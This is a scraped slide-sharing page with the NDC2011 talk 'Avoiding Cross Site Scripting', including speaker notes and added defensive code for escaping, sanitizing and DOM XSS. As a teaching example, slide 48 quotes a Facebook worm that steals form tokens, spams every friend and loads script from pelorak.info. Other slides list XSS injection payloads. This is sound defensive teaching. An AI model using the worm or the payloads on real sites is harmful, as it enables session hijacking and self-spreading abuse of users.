08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 

Kürzlich hochgeladen (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Boost Fertility New Invention Ups Success Rates.pdf
Avoiding Cross Site Scripting - Not as easy as you might think

  • 1. Avoiding Cross Site Scripting Not as easy as you might think NDC2011 – Erlend Oftedal
  • 2. Y
  • 4. Some security experts say it's easy to protect against... but that may not always be the case
  • 5. Statistics: a common error, listed in the OWASP Top 10 and the SANS Top 25 Most Dangerous Software Errors. http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 6. XSS - statistics http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  • 8. Risk: stealing data from the client; stealing data from the server; exploiting the browser; session hijacking; form manipulation / keylogging.
  • 11. Why the name Cross Site Scripting? <iframe src="http://mail.google.com"> <script> </iframe>
  • 15. Demo
  • 16. What's going on? <input type="text" name="search" value=""> An input of 123 yields: <input type="text" name="search" value="123"> An input of hello"world yields: <input type="text" name="search" value="hello"world"> An input of hello"><script>alert(1)</script> yields: <input type="text" name="search" value="hello"><script>alert(1)</script>">
  • 17. Types of Cross Site Scripting Reflected Persistent Second order / indirect / side channel
  • 23. What data can you actually trust? Scripts? Web services? Databases?
  • 24. Input validation: blacklisting keywords; blacklisting/whitelisting characters.
  • 25. How do you validate input? Input: test Validation: [a-z]+
  • 26. How do you validate input? Input: "this is a test" Validation: [a-z"]+
  • 27. How do you validate input? Input: Conan O’Brian Validation: [a-zA-Z"']+
  • 28. How do you validate input? Input: No, your calculation is wrong, because x > 5 Validation: [a-zA-Z"'>.,]+
  • 29. How do you validate input? Input: Try moving the <script> tag to the bottom of the page. Validation: [a-zA-Z"'<>.,]+
  • 30. ASP.NET Request Validation: throws an exception when a request value contains &# or a < followed by a letter, !, ? or /. It can be disabled per page or per model field, and there is sometimes a good reason to disable it (an application that legitimately accepts HTML). It only stops the simpler attacks: a payload that breaks out of an attribute or a JavaScript string without ever using < passes straight through.
  • 31. Demo
  • 32. A couple of tricks. Build a JavaScript string without quotes: String.fromCharCode(88, 83, 83) or /XSS/.source. Run script without any user interaction: <img src="x" onerror="alert(1)" /> or <input ... value="" autofocus onfocus="alert(1)" />
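The request-validation rule from slide 30 and the tricks above, as an added example that is not code from the slides: a model of the ASP.NET Request Validation check as the slide states it (reject "&#", and "<" followed by a letter, "!", "?" or "/"), run against the demo payloads. The regex is my reading of the slide, not the framework's own implementation, and the payloads are constructed here; the autofocus one is the bypass from the speaker notes.

```javascript
// Added example, not code from the slides: a model of the ASP.NET Request
// Validation rule as slide 30 describes it (reject "&#", and "<" followed
// by a letter, "!", "?" or "/"). This is my reading of the slide, not the
// framework's own implementation; it exists to show why the check
// "only stops the simpler attacks".
function requestValidationRejects(value) {
  return /&#|<[A-Za-z!?\/]/.test(String(value));
}

// The vulnerable search box from the demo: the value lands in a
// double-quoted attribute with no escaping at all.
function renderUnsafe(value) {
  return `<input type="text" name="search" value="${value}">`;
}

// Constructed payloads. The first two contain a tag and are caught; the
// last two never use "<" and pass validation untouched.
const PAYLOADS = {
  scriptTag: 'hello"><script>alert(1)</script>',
  imgOnerror: '"><img src="x" onerror="alert(1)" />',
  // attribute breakout from the speaker notes: no tag, just new attributes
  autofocus: '" onfocus="alert(1)" autofocus x="',
  // the same idea when the value lands inside a JavaScript string
  jsString: "';alert(1);//",
};

// Names of the payloads that survive validation and reach the page.
function survivingPayloads() {
  return Object.keys(PAYLOADS).filter((k) => !requestValidationRejects(PAYLOADS[k]));
}

// Validation is a tripwire, not a fix: output encoding is the fix.
console.log(survivingPayloads());               // [ 'autofocus', 'jsString' ]
console.log(renderUnsafe(PAYLOADS.autofocus));  // a focused input whose onfocus fires on page load
```

The rendered line for the autofocus payload is `<input type="text" name="search" value="" onfocus="alert(1)" autofocus x="">`: the browser focuses the field on load and runs the handler, and the request never contained a `<`.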
  • 39. It's all a matter of context
  • 40. Per-context escaping: we need to escape depending on the context(s) the data ends up in. The OWASP XSS Prevention Cheat Sheet gives one rule per context.
  • 41. Rule #0, forbidden locations (no escaping scheme makes these safe):
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script>   directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...-->             inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test />       in an attribute name
    <NEVER PUT UNTRUSTED DATA HERE... href="/test" />      in a tag name
  • 42. Rule #1, between tags: <div>...HTML ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</div> => HTML escaping (at minimum &, <, >, " and ').
  • 43. Rule #2, attributes:
    Inside an unquoted attribute: <div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content</div>
    Inside a single-quoted attribute: <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'>content</div>
    Inside a double-quoted attribute: <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">content</div>
    => HTML attribute escaping. Always quote the attribute: an unquoted value ends at the first whitespace, so a single space is enough to start a new attribute such as onfocus.
  • 44. Rule #3, in JavaScript strings:
    Inside a quoted string: <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
    One side of a quoted expression: <script>x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</script>
    Inside a quoted event handler: <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"></div>
    => JavaScript escaping (\xHH / \uHHHH, not backslash-quoting). In the event-handler case the browser decodes the attribute before the script runs, so JavaScript-escape first and then HTML-attribute-escape. NEVER put untrusted data inside strings passed to eval(), setTimeout(), setInterval() and similar, escaped or not: whatever the string contains is executed.
  • 45. Rule #4, in CSS:
    <style> selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
    <style> selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; } </style>
    <span style="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">text</span>
    => CSS escaping (\HH followed by a space).
  • 46. Rule #5, URLs: <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a> => URL escaping of the parameter value. Never let untrusted data supply the whole URL or its scheme; percent-encoding does nothing against a javascript: URL.
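The search-box demo from slide 16 and Rules #1 to #5 above, as one added example that is not code from the slides: a small encoder per context, following the encoding choices of the OWASP cheat sheet the rules are quoted from, applied to the demo payload. Function names and the sample values are my own.

```javascript
// Added example, not code from the slides: one encoder per context for
// Rules #1 to #5, applied to the search box from the "What's going on?"
// demo. Function names are mine; the encodings follow the OWASP XSS
// Prevention Cheat Sheet.

// Rule #1 (between tags) and Rule #2 (inside a quoted attribute).
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Rule #2, unquoted attribute: whitespace, "=", "/" and more all end the
// value, so encode everything except alphanumerics as &#xHH;.
function attrEscapeUnquoted(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => '&#x' + c.codePointAt(0).toString(16).toUpperCase() + ';');
}

// Rule #3, inside a quoted JavaScript string: \xHH / \uHHHH escapes, so
// neither a quote nor "</script>" can end the string or the element.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0').toUpperCase();
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0').toUpperCase();
    return '\\u{' + cp.toString(16).toUpperCase() + '}';
  });
}

// Rule #4, CSS value: \HH terminated by a space.
function cssEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => '\\' + c.codePointAt(0).toString(16).toUpperCase() + ' ');
}

// Rule #5, URL query parameter value (never the whole URL or its scheme).
function urlParamEscape(s) {
  return encodeURIComponent(String(s));
}

// The demo's search box: as on the slide, and with Rule #2 applied.
function renderSearchBoxUnsafe(value) {
  return `<input type="text" name="search" value="${value}">`;
}
function renderSearchBox(value) {
  return `<input type="text" name="search" value="${htmlEscape(value)}">`;
}

// The same value inside a <script> block: quoting alone is not enough,
// Rule #3 is what keeps "</script>" and "'" inert.
function renderScriptVar(value) {
  return `<script>var q = '${jsStringEscape(value)}';</script>`;
}

const PAYLOAD = 'hello"><script>alert(1)</script>';
console.log(renderSearchBoxUnsafe(PAYLOAD)); // the broken markup from slide 16
console.log(renderSearchBox(PAYLOAD));       // value="hello&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;"
console.log(renderScriptVar('</script><script>alert(1)</script>'));
```

Note that the attribute encoder and the JavaScript-string encoder are not interchangeable: `&quot;` inside a `<script>` block is three literal characters to the JavaScript parser, and `\x22` inside an HTML attribute is four literal characters to the HTML parser. Pick the encoder by the context the value lands in, and for the event-handler case of Rule #3 apply `jsStringEscape` and then `htmlEscape`.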
  • 48. Real-world example: the payload of a Facebook "verify your account" worm.
    var message = "Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process...";
    var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
    var myText = "==>[VERIFY MY ACCOUNT]<==";
    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    var friends = new Array();
    gf = new XMLHttpRequest();
    gf.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&" + Math.random(), false);
    gf.send();
    if (gf.readyState != 4) {
    } else {
      data = eval('(' + gf.responseText.substr(9) + ')');
      if (data.error) {
      } else {
        friends = data.payload.entries.sort(function(a, b) { return a.index - b.index; });
      }
    }
    for (var i = 0; i < friends.length; i++) {
      var httpwp = new XMLHttpRequest();
      var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
      var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
      httpwp.open("POST", urlwp, true);
      httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      httpwp.setRequestHeader("Content-length", paramswp.length);
      httpwp.setRequestHeader("Connection", "keep-alive");
      httpwp.onreadystatechange = function() {
        if (httpwp.readyState == 4 && httpwp.status == 200) {
        }
      };
      httpwp.send(paramswp);
    }
    alert("Verification Failed.\nClick 'OK' and follow the steps to prevent your account from being deleted.");
    document.location = "http://pelorak.info/verify.php?js";
  • 49. The part that matters: the "action link" of the posted message is a javascript: URL that loads the attacker's script, and it is posted to every friend.
    var myText = "==>[VERIFY MY ACCOUNT]<==";
    var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
    ...
    For each friend, post a message {
      var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
      var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
      ...
    }
  • 50. Rule#6 – Use a policy driven engine Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way. Must be a whitelist based engine. OWASP AntiSamy HtmlPurifier
  • 51. Why you do NOT write your own HTML-cleaner/sanitizer <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|^`=alert("XSS")> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾ http://ha.ckers.org/xss.html
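Rule #6 and the "do not write your own sanitizer" slide, as an added example that is not code from the slides: a naive blacklist sanitizer of the kind people write themselves, run against the ha.ckers.org vectors quoted above, next to the opposite approach of encoding everything and re-admitting a tiny allowlist of bare tags. Both functions are mine and constructed for this page; the allowlist one illustrates the principle only, and for real user-supplied HTML a policy engine such as AntiSamy or HtmlPurifier is still the answer.

```javascript
// Added example, not code from the slides. naiveSanitize is a deliberately
// weak blacklist written the way home-grown sanitizers usually are;
// allowlistSanitize shows the whitelist principle behind Rule #6.

// Blacklist: strip <script ...>...</script>, on*= handlers, javascript: URLs.
function naiveSanitize(html) {
  return String(html)
    .replace(/<script(\s[^>]*)?>[\s\S]*?<\/script>/gi, '')
    .replace(/\son\w+\s*=/gi, ' ')
    .replace(/javascript:/gi, '');
}

// Vectors quoted on the slide (the charset trick is left out: it is a
// decoding problem, not a string-matching one).
const VECTORS = [
  '<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>',
  '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
  '<BODY onload!#$%&()*~+-_.,:;?@[/|^`=alert("XSS")>',
  '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">',
];

// Which vectors come back byte-for-byte untouched by the blacklist?
// The "/" instead of a space, and the junk between onload and "=", are
// enough: the browser still parses both as a script src and an event
// handler, the regexes do not.
function unchangedAfterNaive() {
  return VECTORS.filter((v) => naiveSanitize(v) === v);
}

// Allowlist: encode everything, then turn back only bare <b>, <i>, <p>,
// <br> and their closing forms. No attribute can survive, so no handler,
// no src and no javascript: URL can either.
const ALLOWED_TAGS = ['b', 'i', 'p', 'br'];
function allowlistSanitize(html) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  let out = String(html).replace(/[&<>"']/g, (c) => map[c]);
  for (const tag of ALLOWED_TAGS) {
    out = out.replace(new RegExp('&lt;(/?)' + tag + '&gt;', 'gi'), '<$1' + tag + '>');
  }
  return out;
}

// Number of raw "<" in the output that are not one of the allowlisted bare tags.
function rawTagsLeft(html) {
  return (html.match(/<(?!\/?(?:b|i|p|br)>)/g) || []).length;
}

console.log(unchangedAfterNaive());                  // the SCRIPT/SRC and BODY onload vectors
console.log(VECTORS.map((v) => rawTagsLeft(allowlistSanitize(v)))); // [ 0, 0, 0, 0 ]
console.log(allowlistSanitize('<b>hi</b><script>alert(1)</script>'));
```

Two of the four vectors pass the blacklist unchanged, and adding a regex for each would only move the problem to the next vector on the list. The allowlist version is safe because it starts from "nothing is markup" and admits exact literal tags; the moment you need attributes (links, images) you are writing an HTML parser and a policy, which is what AntiSamy and HtmlPurifier already are.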
  • 52. Rule#7 – Avoid DOM based XSS
  • 56. window.location.hash allows attacks that are present in the URL but never seen by the server: the browser does not send the fragment in the HTTP request, so server-side filters, request validation and logs never get a look at it. http://www.somesite.com/#banner=may2011 http://www.somesite.com/#banner=may2011"><script>...
  • 57. Demo
  • 58. Demo: $(location.hash) with a fragment of #<script>alert(1)</script>. jQuery of that era treats a string containing markup as HTML to build rather than as a selector, so the fragment becomes DOM nodes. http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
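The `$(location.hash)` sink from the two slides above, as an added example that is not code from the slides: a model of how a pre-1.9 jQuery `$()` decided between "selector" and "HTML", next to the check the page author actually wanted. The regular expression is my reconstruction of the old jQuery quickExpr and should be read as an assumption; jQuery itself is not used, so the example runs without a browser. From jQuery 1.9 on, only strings that begin with `<` are treated as HTML, which is why this particular demo stopped working on newer versions while the pattern stayed dangerous.

```javascript
// Added example, not code from the slides: why $(location.hash) is a DOM
// XSS sink. LEGACY_QUICK_EXPR is my reconstruction of the pre-1.9 jQuery
// regex (an assumption): markup anywhere in the string wins over "#id".
const LEGACY_QUICK_EXPR = /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w-]*)$)/;

// How a legacy $(arg) would treat the string.
function classifyLegacyJqueryArg(arg) {
  const m = LEGACY_QUICK_EXPR.exec(String(arg));
  if (m && m[1]) return 'html';              // parsed as markup: handlers and scripts run
  if (m && m[2] !== undefined) return 'id';  // "#foo" -> getElementById
  return 'selector';                         // handed to the selector engine
}

// What the page author meant: the fragment names an element and nothing
// more. Returns the bare id, or null when the fragment is not a plain id.
function safeHashId(hash) {
  const m = /^#([A-Za-z0-9_-]+)$/.exec(String(hash));
  return m ? m[1] : null;
}

// Constructed fragments: a plain id, the slide's demo, and the attacker's
// URL from slide 56. None of them is ever sent to the server.
const BENIGN_HASH  = '#may2011';
const SLIDE_HASH   = '#<script>alert(1)</script>';
const HOSTILE_HASH = '#banner=may2011"><script>alert(1)</script>';

console.log(classifyLegacyJqueryArg(BENIGN_HASH));   // id
console.log(classifyLegacyJqueryArg(HOSTILE_HASH));  // html
console.log(safeHashId(HOSTILE_HASH));               // null
```

In the page itself the safe form is `const id = safeHashId(location.hash); if (id) document.getElementById(id)`, which never hands the fragment to a function that might interpret it as markup. Validating the fragment against a strict pattern is what the DOM based XSS prevention cheat sheet linked below calls for before any DOM sink.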
  • 60. Beware of the complex contexts
  • 61. See the OWASP DOM based XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
  • 63. AntiXss as the default encoder, in Web.config: <system.web> <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary" /> (new in 4.1 beta)
  • 64. MVC3 Razor: @SomeValue is HTML escaped; @Html.Raw(SomeValue) is not escaped; @{ var value = new HtmlString("<p>hello</p>"); } @value is not escaped; @Html.TextBox(...) escapes attributes. This automatic escaping will not protect against data placed inside JavaScript in the HTML, or JavaScript inside HTML attributes (event handlers): those contexts need Rule #3, not HTML escaping.
  • 66. Content Security Policy: header based, the server instructs the browser which sources it may load and run.
  • 67. Policies for JavaScript, frames, images, style etc.:
    X-Content-Security-Policy: allow *; script-src 'self'
    X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.ndc2010.no:443
    X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script
    This is the pre-standard Mozilla syntax of 2011; the standardised header is Content-Security-Policy, with default-src in place of allow and 'unsafe-inline' / 'unsafe-eval' in place of the options directive. Note that the third policy re-enables inline and eval'd script, which gives back most of what CSP takes away from an XSS payload.
    https://wiki.mozilla.org/Security/CSP/Spec http://nuget.org/List/Packages/ContentSecurityPolicy.Net
  • 68. Other approaches: taint tracking. A variable is marked as tainted if it contains user input: tainted + tainted = tainted; untainted + tainted = tainted; untainted + untainted = untainted. Partial taint allows for partial escaping: var html = "<h1>" + user_value + "</h1>"; [bitmask = 0000 1111111... 00000], so the framework can escape only the user-controlled range when the string reaches a sink.
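The partial-taint idea above, as an added example that is not code from the slides or from any of the tools named in the notes: a toy tainted-string type carrying one taint bit per character, with concatenation preserving the mask and an HTML-body renderer that escapes only the tainted range. Class and function names are mine.

```javascript
// Added example, not code from the slides: a toy tainted string with the
// per-character bitmask from slide 68. Literal markup from the template is
// trusted; user input is tainted; concatenation keeps the mask; rendering
// escapes only characters that carry taint.
class TaintedString {
  constructor(value, taint) {
    this.value = value;
    // one boolean per UTF-16 code unit; true = came from user input
    this.taint = taint || new Array(value.length).fill(false);
  }
  static trusted(s) { return new TaintedString(String(s), new Array(String(s).length).fill(false)); }
  static fromUser(s) { return new TaintedString(String(s), new Array(String(s).length).fill(true)); }

  // tainted + anything = tainted for the tainted range only; a plain
  // string on the right-hand side is treated as trusted template text.
  concat(other) {
    const o = other instanceof TaintedString ? other : TaintedString.trusted(other);
    return new TaintedString(this.value + o.value, this.taint.concat(o.taint));
  }
  isTainted() { return this.taint.some(Boolean); }

  // The bitmask as drawn on the slide: "0000 1111111... 00000".
  mask() { return this.taint.map((t) => (t ? '1' : '0')).join(''); }

  // HTML body context: escape tainted characters, pass trusted ones through.
  toHtml() {
    const esc = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
    let out = '';
    for (let i = 0; i < this.value.length; i++) {
      const c = this.value[i];
      out += this.taint[i] && esc[c] ? esc[c] : c;
    }
    return out;
  }
}

// The slide's example: var html = "<h1>" + user_value + "</h1>";
function buildHeading(userValue) {
  return TaintedString.trusted('<h1>')
    .concat(TaintedString.fromUser(userValue))
    .concat('</h1>');
}

const h = buildHeading('<b>x</b>');
console.log(h.mask());    // 00001111111100000
console.log(h.toHtml());  // <h1>&lt;b&gt;x&lt;/b&gt;</h1>
```

The point the slide makes is visible in the mask: the sink does not need to know where the string came from, because the taint travelled with it through the concatenation. A real implementation (the notes mention DOMinator and the Rails and Python work) also has to carry taint through substring, replace and encoding calls, and pick the escaper by sink context, which is exactly the per-context problem from Rules #1 to #5.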
  • 75. SVG can be declared inline: <html>...<div>...<svg>... http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf
  • 78. Other types of XSS - Plugins XSS in flash XSS in Adobe Reader
  • 79. Questions Join your local OWASP chapter (NNUG for web security)! Oslo chapter is at https://www.owasp.org/index.php/Norway Erlend Oftedal erlend.oftedal@bekk.no @webtonull
  • 81. OWASP XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • 82. OWASP DOM based XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
  • 84. HTML5 security cheat sheet: http://html5sec.org/
  • 85. Locking the throne room, Mario Heiderich: https://www.owasp.org/images/a/a3/Mario_Heiderich_OWASP_Sweden_Locking_the_throneroom.pdf
  • 86. The image that called me, Mario Heiderich: http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf

Speaker notes

  1. Why on earth are we talking about cross site scripting? Isn’t that really old?
  2. Back in the 90's, any proper website would have a guestbook. People would post all sorts of shady images, inject H1, or <bgcolor> or <blink>. Spammers took over: immediate redirect to their glorious viagra store.
  3. Already security conscious
  4. If we were not protected against cross site scripting.... Same Origin Policy: same domain, port and protocol. This is changing with cross domain requests, but this is basically what the SOP says.
  5. Search field XSS: escape out into a script tag.
  6. What can you actually trust?
  7. Do you really know all the events in HTML5? Do you really know all the reserved words in JavaScript? Could any of those be valid inputs?
  8. DEMO: turn it on and show it anyway: " onfocus="alert(1)" autofocus x="
  9. Turn on request validation. Use onfocus + autofocus.
  10. This will stop a lot of the attacks, but unfortunately not all of them.
  11. http://localhost:62795/OwaspXss/Rule3
  12. Firebug + javascript
  13. Expression; Opera modifies the link.
  14. Notice the mobile icon
  15. html5sec.org/innerhtml
  16. Demo if time permits.
  17. Allows the system to track taint from source to sink, even through transformations. Allows the framework to know which strings need to be escaped. DOMinator; Ruby on Rails + Python.
  18. Demo if time permits.
  19. NDC video!